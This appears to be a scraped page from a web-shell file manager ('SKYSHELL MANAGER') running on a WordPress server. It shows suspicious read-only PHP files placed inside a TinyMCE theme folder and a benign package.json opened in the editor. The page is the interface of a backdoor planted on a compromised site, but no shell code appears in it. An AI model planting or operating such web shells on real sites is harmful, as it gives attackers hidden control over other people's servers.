📁
SKYSHELL MANAGER
PHP v8.3.6
Create
Create
Path:
root
/
var
/
www
/
cstage
/
wp-includes
/
js
/
tinymce
/
themes
/
Name
Size
Perm
Actions
📁
inlite
-
0755
🗑️
🏷️
🔒
📁
modern
-
0755
🗑️
🏷️
🔒
📄
ms-files.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-activate.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: package.json
{ "name": "acorn-globals", "version": "6.0.0", "description": "Detect global variables in JavaScript using acorn", "keywords": [ "ast", "variable", "name", "lexical", "scope", "local", "global", "implicit" ], "files": [ "index.js", "LICENSE" ], "dependencies": { "acorn": "^8.1.0", "acorn-walk": "^8.0.2" }, "devDependencies": { "testit": "^3.1.0" }, "scripts": { "test": "node test" }, "repository": { "type": "git", "url": "https://github.com/ForbesLindesay/acorn-globals.git" }, "author": "ForbesLindesay", "license": "MIT" }
Save